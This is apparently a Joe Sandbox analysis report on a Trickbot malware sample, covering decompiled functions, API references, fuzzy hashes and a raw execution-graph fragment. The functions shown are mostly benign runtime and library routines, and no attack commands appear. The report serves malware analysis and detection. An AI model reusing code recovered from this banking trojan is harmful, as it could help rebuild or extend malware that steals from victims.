				_t18 =  *0x0044BD40;                                                            // 0x0040fc12
				 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;                                       // 0x0040fc15
				if(_t18 <= 0) {                                                                 // 0x0040fc1b
					L5:                                                                         // 0x0040fc2f
					E0040FD0F(_t28);                                                            // 0x0040fc31
				} else {                                                                        // 0x0040fc1d
					 *((char*)(_t18 + 0x44bf14)) =  *((char*)(_t18 + 0x44bf14)) - 1;            // 0x0040fc1d
					if( *((char*)( *((intOrPtr*)(0x44bd40)) + 0x44bf14)) <= 0) {                // 0x0040fc2d
						goto L5;                                                                // 0x00000000
					}                                                                           // 0x00000000
				}                                                                               // 0x0040fc2d
				_t20 = E0040DFC2(_t28 + 0x20);                                                  // 0x0040fc39
				 *[fs:0x0] =  *((intOrPtr*)(_t30 - 0xc));                                       // 0x0040fc42
				return _t20;                                                                    // 0x0040fc4a
			}

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: H_prolog
                          • String ID: @C$LC
                          • API String ID: 3519838083-3536014141
                          • Opcode ID: 2c20c0550ff517b536965ffc2f7513579a371389062e96a8409c6c0f06e4bf14
                          • Instruction ID: 4bf6fb591218577045a7376577987f05f18d2fd96a210d26914e3d5483a51808
                          • Opcode Fuzzy Hash: 2c20c0550ff517b536965ffc2f7513579a371389062e96a8409c6c0f06e4bf14
                          • Instruction Fuzzy Hash: A5F0AD706046408BE324DF19C505A697BE0FB08304F1488BFE443AB781D778A905CF4D
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 85%
			// C++ constructor for a class with a virtual base (thiscall, this in ECX): the hidden
			// "most derived" flag at [ebp+0x14] decides whether the vbtable pointer (0x43ec4c) and the
			// virtual base (0x43ec48) are initialised here; the base-class vtable pointer 0x43ec40 is
			// then stored through the vbtable offset. E00405340 is __EH_prolog (per the APIs list of
			// E004100D8 below). Trailing comments give the report's instruction address per statement.
			E0040EED2(intOrPtr* __ecx) {
				intOrPtr* _t28;
				void* _t30;

				E00405340(E00438CF6, _t30);                                                               // 0x0040eed7
				_push(__ecx);                                                                             // 0x0040eedc
				_push(__ecx);                                                                             // 0x0040eedd
				_t28 = __ecx;                                                                             // 0x0040eee4
				 *((intOrPtr*)(_t30 - 0x14)) = __ecx;                                                     // 0x0040eee6
				 *((intOrPtr*)(_t30 - 0x10)) = 0;                                                         // 0x0040eee9
				if( *((intOrPtr*)(_t30 + 0x14)) != 0) {                                                   // 0x0040eeec
					 *__ecx = 0x43ec4c;                                                                   // 0x0040eeee
					 *((intOrPtr*)(__ecx + 0x28)) = 0;                                                    // 0x0040eef4
					 *((intOrPtr*)(__ecx + 4)) = 0x43ec48;                                                // 0x0040eef7
					 *((intOrPtr*)(_t30 - 0x10)) = 1;                                                     // 0x0040eefe
					 *((intOrPtr*)(_t30 - 4)) = 0;                                                        // 0x0040ef05
				}                                                                                         // 0x0040ef05
				 *((intOrPtr*)( *((intOrPtr*)( *_t28 + 4)) + _t28)) = 0x43ec40;                           // 0x0040ef10
				if( *((intOrPtr*)(_t30 + 0x10)) != 0) {                                                   // 0x0040ef17
					E0040F745( *((intOrPtr*)( *_t28 + 4)) + _t28, _t30,  *((intOrPtr*)(_t30 + 8)),  *((intOrPtr*)(_t30 + 0xc)));  // 0x0040ef26
				}                                                                                         // 0x0040ef26
				 *[fs:0x0] =  *((intOrPtr*)(_t30 - 0xc));                                                 // 0x0040ef31
				return _t28;                                                                              // 0x0040ef39
			}

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: H_prolog
                          • String ID: HC$LC
                          • API String ID: 3519838083-3777758554
                          • Opcode ID: 9736e670d445d14e1ac8866678feab1403ae9e206676d071f5dd1ca3b5d7eb89
                          • Instruction ID: 2c3081881f85edbeaa1b345c483475d37f09ac393e85901a2881550ebc865d15
                          • Opcode Fuzzy Hash: 9736e670d445d14e1ac8866678feab1403ae9e206676d071f5dd1ca3b5d7eb89
                          • Instruction Fuzzy Hash: CD011D719016159FD719CF55C404A9EBBF0FF08304F14992FE846AB381D7B5A950CF58
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 68%
			// MonitorFromRect wrapper in the shape of the multimon.h compatibility stub
			// (xMonitorFromRect): when the real API has not been resolved (E004041CD() == 0) it returns
			// the pseudo-handle xPRIMARY_MONITOR (0x12340042) if the caller passed
			// MONITOR_DEFAULTTOPRIMARY|MONITOR_DEFAULTTONEAREST (0x3) or the RECT intersects the primary
			// display, and NULL otherwise; with the API available it calls through the pointer at
			// 0x44b0c8. Trailing comments give the report's instruction address per statement.
			E004042A5(char _a4, signed int _a8) {
				intOrPtr* _t18;

				if(E004041CD() == 0) {                                                                    // 0x004042ae
					if((_a8 & 0x00000003) != 0) {                                                         // 0x004042c5
						L8:                                                                               // 0x004042f1
						return 0x12340042;                                                                // 0x00000000
					}                                                                                     // 0x004042f1
					_t6 =  &_a4; // 0x40435e                                                              // 0x004042c7
					_t18 =  *_t6;                                                                         // 0x004042c7
					// RECT: right <= 0, bottom <= 0, left >= SM_CXSCREEN or top >= SM_CYSCREEN means no overlap with the primary display
					if( *((intOrPtr*)(_t18 + 8)) <= 0 ||  *((intOrPtr*)(_t18 + 0xc)) <= 0 ||  *_t18 >= GetSystemMetrics(0) ||  *((intOrPtr*)(_t18 + 4)) >= GetSystemMetrics(1)) {  // 0x004042d0
						return 0;                                                                         // 0x00000000
					} else {                                                                              // 0x00000000
						goto L8;                                                                          // 0x00000000
					}                                                                                     // 0x00000000
				}                                                                                         // 0x004042d0
				return  *0x44b0c8(_a4, _a8);                                                              // 0x00000000
			}

                          APIs
                          • GetSystemMetrics.USER32(00000000), ref: 004042DE
                          • GetSystemMetrics.USER32(00000001), ref: 004042E6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: MetricsSystem
                          • String ID: ^C@
                          • API String ID: 4116985748-887851006
                          • Opcode ID: 7d63253bacac1d02d03c4edf3a55ec31adf953980967ea9a6e4b7f742f838365
                          • Instruction ID: 2955014addd01754330358916620dbef1c81e24187c4ea93dcfe4272a6edf640
                          • Opcode Fuzzy Hash: 7d63253bacac1d02d03c4edf3a55ec31adf953980967ea9a6e4b7f742f838365
                          • Instruction Fuzzy Hash: CAF09075214342CBC7219B768C00527B7E0ABD43D8F404C7EF695A2590D338D882EB6D
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 85%
			// Constructor of the same family as E0040EED2 above (virtual-base flag at [ebp+0x10] here,
			// vbtable pointer 0x43ec54, virtual base at +8, base vtable 0x43ec38), always followed by
			// the initialiser call E0040F745. E00405340 is __EH_prolog. Trailing comments give the
			// report's instruction address per statement.
			E0040EFF0(intOrPtr* __ecx) {
				intOrPtr* _t28;
				void* _t30;

				E00405340(E00438D3E, _t30);                                                               // 0x0040eff5
				_push(__ecx);                                                                             // 0x0040effa
				_push(__ecx);                                                                             // 0x0040effb
				_t28 = __ecx;                                                                             // 0x0040f002
				 *((intOrPtr*)(_t30 - 0x14)) = __ecx;                                                     // 0x0040f004
				 *((intOrPtr*)(_t30 - 0x10)) = 0;                                                         // 0x0040f007
				if( *((intOrPtr*)(_t30 + 0x10)) != 0) {                                                   // 0x0040f00a
					 *__ecx = 0x43ec54;                                                                   // 0x0040f00c
					 *((intOrPtr*)(__ecx + 0x2c)) = 0;                                                    // 0x0040f012
					 *((intOrPtr*)(__ecx + 8)) = 0x43ec48;                                                // 0x0040f015
					 *((intOrPtr*)(_t30 - 0x10)) = 1;                                                     // 0x0040f01c
					 *((intOrPtr*)(_t30 - 4)) = 0;                                                        // 0x0040f023
				}                                                                                         // 0x0040f023
				 *((intOrPtr*)(_t28 + 4)) = 0;                                                            // 0x0040f026
				 *((intOrPtr*)( *((intOrPtr*)( *_t28 + 4)) + _t28)) = 0x43ec38;                           // 0x0040f034
				E0040F745( *((intOrPtr*)( *_t28 + 4)) + _t28, _t30,  *((intOrPtr*)(_t30 + 8)),  *((intOrPtr*)(_t30 + 0xc)));  // 0x0040f042
				 *[fs:0x0] =  *((intOrPtr*)(_t30 - 0xc));                                                 // 0x0040f04d
				return _t28;                                                                              // 0x0040f055
			}

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: H_prolog
                          • String ID: HC$TC
                          • API String ID: 3519838083-4078565266
                          • Opcode ID: 76b7413acd93e13ed59c9a5696f673bf48dfb41152db73430a47ed3f66f13e24
                          • Instruction ID: 3ae02a703609bbdba7311556ac52154405d795a2a08133e5722b716cd1217bbc
                          • Opcode Fuzzy Hash: 76b7413acd93e13ed59c9a5696f673bf48dfb41152db73430a47ed3f66f13e24
                          • Instruction Fuzzy Hash: EA01F6B1A006159FCB24CF59C404A9EBBF0FB08304B10992EE459A7781D7B8A900CF54
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 81%
			// Two routines merged by the decompiler. 0x004100d8..0x0041012c is a throw helper: it
			// builds an exception object whose message is "string too long" (the text of the C++
			// length_error that std::string raises) and throws it through E00405861, which wraps
			// RaiseException (see the APIs list below), so control never reaches the _pop at
			// 0x00410131. The APIs list names 00410132 as a separate function; its body, a constructor
			// with its own __EH_prolog frame, follows from there. Trailing comments give the report's
			// instruction address per statement.
			E004100D8(void* __eflags) {
				intOrPtr* _t42;
				intOrPtr* _t52;
				void* _t54;
				signed int _t60;

				E00405340(E00438EA4, _t54);                                                               // 0x004100dd
				 *((char*)(_t54 - 0x20)) =  *((intOrPtr*)(_t54 - 0xd));                                   // 0x004100ee
				E0040E765(_t54 - 0x20, 0);                                                                // 0x004100f1
				E0040E9CB(_t54 - 0x20, _t54, "string too long", E00409BE0("string too long"));            // 0x00410107
				_t5 = _t54 - 4;                                                                           // 0x0041010c
				 *_t5 =  *(_t54 - 4) & 0x00000000;                                                        // 0x0041010c
				_t60 =  *_t5;                                                                             // 0x0041010c
				_push(_t54 - 0x20);                                                                       // 0x00410113
				_t42 = _t54 - 0x3c;                                                                       // 0x00410114
				L1();                                                                                     // 0x00410117
				 *((intOrPtr*)(_t54 - 0x3c)) = 0x43ed58;                                                  // 0x00410125
				// throw: exception object at ebp-0x3c, type descriptor at 0x444198
				E00405861(_t54 - 0x3c, 0x444198);                                                         // 0x0041012c
				_pop(_t51);                                                                               // 0x00410131
				// start of the second routine (00410132)
				E00405340(E00438EB8, _t54);                                                               // 0x00410137
				_push(_t42);                                                                              // 0x0041013c
				_push(_t42);                                                                              // 0x0041013d
				_t52 = _t42;                                                                              // 0x00410144
				 *((intOrPtr*)(_t54 - 0x14)) = _t52;                                                      // 0x00410147
				 *((intOrPtr*)(_t54 - 0x10)) = 0x449350;                                                  // 0x0041014a
				E004144DA(_t42, _t60, _t54 - 0x10);                                                       // 0x00410151
				 *(_t54 - 4) =  *(_t54 - 4) & 0x00000000;                                                 // 0x00410159
				 *((char*)(_t52 + 0xc)) =  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8))));                     // 0x00410166
				E0040E765(_t52 + 0xc, 0);                                                                 // 0x00410168
				E0040FD59(_t52 + 0xc,  *((intOrPtr*)(_t54 + 8)), 0,  *0x43ec30);                          // 0x00410178
				 *_t52 = 0x43ed78;                                                                        // 0x00410180
				 *[fs:0x0] =  *((intOrPtr*)(_t54 - 0xc));                                                 // 0x0041018b
				return _t52;                                                                              // 0x00410193
			}

                          APIs
                          • __EH_prolog.LIBCMT ref: 004100DD
                            • Part of subcall function 00410132: __EH_prolog.LIBCMT ref: 00410137
                            • Part of subcall function 00405861: RaiseException.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00405287,00000000), ref: 0040588F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: H_prolog$ExceptionRaise
                          • String ID: XC$string too long
                          • API String ID: 2062786585-2317762258
                          • Opcode ID: fe9368cbbbf84fa041624c24df6f425f7c455d15ae19cf93271a8edbd1b53c0b
                          • Instruction ID: 4b9643e82e25b7094b8b0c40d244b5d6f0ee490785af3aecc81733f7c77c5746
                          • Opcode Fuzzy Hash: fe9368cbbbf84fa041624c24df6f425f7c455d15ae19cf93271a8edbd1b53c0b
                          • Instruction Fuzzy Hash: ADF0FE66C11258AADB04F7E6D846ADEB77CAF18318F40446AF411B6092DF7C5A04CB69
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 88%
                          			E00412040(struct HWND__* _a20) {
                          				struct HWND__* _t3;
                          				int _t5;
                          				void* _t9;
                          				CHAR* _t10;
                          
                          				_t10 = _t9 - 0x10;
                          				if( *0x44d360 < 0x35f) {
                          					L3:
                          					return 1;
                          				} else {
                          					_t3 = _a20;
                          					if(_t3 == 0) {
                          						goto L3;
                          					} else {
                          						GetClassNameA(_t3, _t10, 0x10);
                          						_t5 = lstrcmpA(_t10, "ComboBox");
                          						asm("sbb eax, eax");
                          						return _t5 + 1;
                          					}
                          				}
                          			}


                          APIs
                          • GetClassNameA.USER32(?,?,00000010), ref: 0041205E
                          • lstrcmpA.KERNEL32(?,ComboBox,?,00000010), ref: 0041206E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: ClassNamelstrcmp
                          • String ID: ComboBox
                          • API String ID: 3770760073-1152790111
                          • Opcode ID: 2ac1e9ac59f64678fe8f307443fac26cfc83c2e0c3e33e3da96cb4e46f1c3244
                          • Instruction ID: 70eada050e16ef3b60972735b7ba3c3ddda0e91231b9546bd1956712589a64a0
                          • Opcode Fuzzy Hash: 2ac1e9ac59f64678fe8f307443fac26cfc83c2e0c3e33e3da96cb4e46f1c3244
                          • Instruction Fuzzy Hash: B9E0DF706002016BD714AB68CD0ABAA32A4F708701F880E5CF559C21A1F7FAD9A4C20A
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00431EFF(void* __ecx) {
                          				short _t5;
                          				void* _t8;
                          
                          				_t8 = __ecx;
                          				 *((short*)(_t8 + 0xb0)) = GlobalAddAtomA( *(__ecx + 0x88));
                          				_t5 = GlobalAddAtomA("system");
                          				 *(_t8 + 0xb2) = _t5;
                          				return _t5;
                          			}


                          APIs
                          • GlobalAddAtomA.KERNEL32(?), ref: 00431F0F
                          • GlobalAddAtomA.KERNEL32(system), ref: 00431F1D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: AtomGlobal
                          • String ID: system
                          • API String ID: 2189174293-3377271179
                          • Opcode ID: 3cec64a00b4a55b79221fc4e6b7606f82d32add807d0cb78f2aa499863a6c7e2
                          • Instruction ID: 0809506807bf572a4bc7ee841f343839afbb796f28b25228447e89507f9524cd
                          • Opcode Fuzzy Hash: 3cec64a00b4a55b79221fc4e6b7606f82d32add807d0cb78f2aa499863a6c7e2
                          • Instruction Fuzzy Hash: F6D0C92651879056CA2067B9AC01B87B2A9BFC5210F16152FE455831209BA028458759
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 60%
                          			E00432C5C(long* __ecx, intOrPtr* _a4, intOrPtr _a8) {
                          				signed int _v8;
                          				void* _t29;
                          				intOrPtr _t32;
                          				long* _t37;
                          				intOrPtr* _t42;
                          				signed int _t45;
                          				struct _CRITICAL_SECTION* _t46;
                          				intOrPtr* _t49;
                          
                          				_push(__ecx);
                          				_t49 = _a4;
                          				_t37 = __ecx;
                          				_t45 = 1;
                          				_v8 = _t45;
                          				if( *((intOrPtr*)(_t49 + 8)) <= _t45) {
                          					L10:
                          					_t46 =  &(_t37[7]);
                          					EnterCriticalSection(_t46);
                          					E004328D6( &(_t37[5]), _t49);
                          					LeaveCriticalSection(_t46);
                          					LocalFree( *(_t49 + 0xc));
                          					if(_t49 != 0) {
                          						 *((intOrPtr*)( *_t49))(1);
                          					}
                          					_t29 = TlsSetValue( *_t37, 0);
                          					L13:
                          					return _t29;
                          				} else {
                          					goto L1;
                          				}
                          				do {
                          					L1:
                          					_t32 = _a8;
                          					if(_t32 == 0 ||  *((intOrPtr*)(_t37[4] + 4 + _t45 * 8)) == _t32) {
                          						_t42 =  *((intOrPtr*)( *(_t49 + 0xc) + _t45 * 4));
                          						if(_t42 != 0) {
                          							 *((intOrPtr*)( *_t42))(1);
                          						}
                          						_t29 =  *(_t49 + 0xc);
                          						 *(_t29 + _t45 * 4) =  *(_t29 + _t45 * 4) & 0x00000000;
                          					} else {
                          						_t29 =  *(_t49 + 0xc);
                          						if( *(_t29 + _t45 * 4) != 0) {
                          							_v8 = _v8 & 0x00000000;
                          						}
                          					}
                          					_t45 = _t45 + 1;
                          				} while (_t45 <  *((intOrPtr*)(_t49 + 8)));
                          				if(_v8 == 0) {
                          					goto L13;
                          				}
                          				goto L10;
                          			}


                          APIs
                          • EnterCriticalSection.KERNEL32(?), ref: 00432CB9
                          • LeaveCriticalSection.KERNEL32(?,?), ref: 00432CC9
                          • LocalFree.KERNEL32(?), ref: 00432CD2
                          • TlsSetValue.KERNEL32(?,00000000), ref: 00432CE8
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: CriticalSection$EnterFreeLeaveLocalValue
                          • String ID:
                          • API String ID: 2949335588-0
                          • Opcode ID: 48fa9aff4c102404775643a88f085fe6451166b81dd0cac608f26f65c7ddd2d1
                          • Instruction ID: 84ff981ff66eb6d4a1579b6f867207a0ff1eadc0cc29494d6b05f6d2c53819b7
                          • Opcode Fuzzy Hash: 48fa9aff4c102404775643a88f085fe6451166b81dd0cac608f26f65c7ddd2d1
                          • Instruction Fuzzy Hash: CA219A31200610EFDB248F48C985BAE77A4FF89711F00A46AE5428B2A1C7B5EC40CB59
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E004330FA(signed int _a4) {
                          				void* _t14;
                          				struct _CRITICAL_SECTION* _t16;
                          				signed int _t22;
                          				intOrPtr* _t25;
                          				intOrPtr _t30;
                          				intOrPtr _t31;
                          
                          				_t30 =  *0x44b70c; // 0x1
                          				if(_t30 == 0) {
                          					_t14 = E00433067();
                          				}
                          				_t31 =  *0x44b708; // 0x0
                          				if(_t31 == 0) {
                          					_t22 = _a4;
                          					_t25 = 0x44b510 + _t22 * 4;
                          					if( *((intOrPtr*)(0x44b510 + _t22 * 4)) == 0) {
                          						EnterCriticalSection(0x44b558);
                          						if( *_t25 == 0) {
                          							InitializeCriticalSection(0x44b570 + (_t22 + _t22 * 2) * 8);
                          							 *_t25 =  *_t25 + 1;
                          						}
                          						LeaveCriticalSection(0x44b558);
                          					}
                          					_t16 = 0x44b570 + (_t22 + _t22 * 2) * 8;
                          					EnterCriticalSection(_t16);
                          					return _t16;
                          				}
                          				return _t14;
                          			}


                          APIs
                          • EnterCriticalSection.KERNEL32(0044B558,?,00000000,?,?,00432E04,00000010,?,00000000,?,?,?,00432587,004325D4,00430506,0043258D), ref: 00433135
                          • InitializeCriticalSection.KERNEL32(00000000,?,00000000,?,?,00432E04,00000010,?,00000000,?,?,?,00432587,004325D4,00430506,0043258D), ref: 00433147
                          • LeaveCriticalSection.KERNEL32(0044B558,?,00000000,?,?,00432E04,00000010,?,00000000,?,?,?,00432587,004325D4,00430506,0043258D), ref: 00433150
                          • EnterCriticalSection.KERNEL32(00000000,00000000,?,?,00432E04,00000010,?,00000000,?,?,?,00432587,004325D4,00430506,0043258D,0041C011), ref: 00433162
                            • Part of subcall function 00433067: GetVersion.KERNEL32(?,0043310A,?,00432E04,00000010,?,00000000,?,?,?,00432587,004325D4,00430506,0043258D,0041C011,0041E91C), ref: 0043307A
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: CriticalSection$Enter$InitializeLeaveVersion
                          • String ID:
                          • API String ID: 1193629340-0
                          • Opcode ID: 8c124c4be3fc2627b3d783a3bc0f87ba09e74264a379837e466de0b4ca150539
                          • Instruction ID: 86c187ca0cd3bf356466e188d9bee37f80f1190fadc38078eab707e7796e6df8
                          • Opcode Fuzzy Hash: 8c124c4be3fc2627b3d783a3bc0f87ba09e74264a379837e466de0b4ca150539
                          • Instruction Fuzzy Hash: F6F03C3940021AEFDB109FA8EC84957B7A8EB5531BF00683BE60592121E738E954CAEC
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00408019(void* __eax) {
                          				void* _t1;
                          
                          				_t1 = __eax;
                          				InitializeCriticalSection( *0x448270);
                          				InitializeCriticalSection( *0x448260);
                          				InitializeCriticalSection( *0x448250);
                          				InitializeCriticalSection( *0x448230);
                          				return _t1;
                          			}


                          APIs
                          • InitializeCriticalSection.KERNEL32(?,00407AB2,?,00405217), ref: 00408026
                          • InitializeCriticalSection.KERNEL32(?,00407AB2,?,00405217), ref: 0040802E
                          • InitializeCriticalSection.KERNEL32(?,00407AB2,?,00405217), ref: 00408036
                          • InitializeCriticalSection.KERNEL32(?,00407AB2,?,00405217), ref: 0040803E
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: CriticalInitializeSection
                          • String ID:
                          • API String ID: 32694325-0
                          • Opcode ID: bce2d2705054481c8eb65c820dec133da36924bce70079a761cef1ed0e5549a4
                          • Instruction ID: dd913382ee95876d4a01ff10f75b0ef6866237a19ef1d154ca1fd69e9cc92bfd
                          • Opcode Fuzzy Hash: bce2d2705054481c8eb65c820dec133da36924bce70079a761cef1ed0e5549a4
                          • Instruction Fuzzy Hash: DCC00239824838ABCE123B66FC0484E3F26FB463A130114FBA104620308EA21C21EFD8
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Execution Graph

                          Execution Coverage:3.3%
                          Dynamic/Decrypted Code Coverage:100%
                          Signature Coverage:24.8%
                          Total number of Nodes:2000
                          Total number of Limit Nodes:6

                          Graph

10237->12750 10239->10228 10239->10230 10241 5cd8b0 3 API calls 10240->10241 10243 5cab75 10241->10243 10242 5cc380 6 API calls 10242->10243 10243->10242 10245 5cf070 4 API calls 10243->10245 10249 5cac34 Sleep 10243->10249 10256 5c5a50 Sleep 10243->10256 10257 5caca4 10243->10257 10274 5cac49 10243->10274 10244 5cac57 10247 5cac68 10244->10247 10248 5c91e0 RtlFreeHeap 10244->10248 10245->10243 10246 5c91e0 RtlFreeHeap 10246->10244 10250 5cac79 10247->10250 10251 5c91e0 RtlFreeHeap 10247->10251 10248->10247 10249->10243 10249->10274 10253 5c91e0 RtlFreeHeap 10250->10253 10254 5cac8a 10250->10254 10251->10250 10252 5d19c0 3 API calls 10255 5cac96 10252->10255 10253->10254 10254->10252 10255->9737 10256->10243 10258 5c7f10 3 API calls 10257->10258 10259 5cacb7 10258->10259 10260 5cc380 6 API calls 10259->10260 10259->10274 10262 5cad16 10260->10262 10261 5d6bd0 4 API calls 10261->10262 10262->10261 10263 5cad3e Sleep 10262->10263 10265 5cad4f 10262->10265 10262->10274 10263->10262 10263->10265 10264 5c5960 46 API calls 10264->10265 10265->10264 10266 5cad79 Sleep 10265->10266 10268 5cad8a 10265->10268 10265->10274 10266->10265 10266->10268 10267 5c3c40 46 API calls 10267->10268 10268->10267 10269 5caddf 10268->10269 10270 5cadc0 Sleep 10268->10270 10268->10274 10271 5c9510 RtlFreeHeap 10269->10271 10273 5cadd1 10269->10273 10270->10268 10270->10273 10271->10273 10272 5c9060 82 API calls 10272->10273 10273->10272 10273->10274 10275 5cae0b Sleep 10273->10275 10274->10244 10274->10246 10275->10273 10275->10274 10299 5d6610 10291->10299 10294 5d322f GetVolumeInformationW 10296 5d3296 10294->10296 10296->10296 10301 5d68e0 10296->10301 10300 5d3220 GetWindowsDirectoryW 10299->10300 10300->10294 10302 5c73b4 CreateMutexW 10301->10302 10304 5d690d 10301->10304 10302->9752 10302->9753 10303 5d69ff MultiByteToWideChar 10303->10304 10304->10302 10304->10303 10304->10304 10306 5c3f2b 10305->10306 10307 5cb7b2 10305->10307 10306->9776 10307->10306 10308 5c3180 3 API calls 
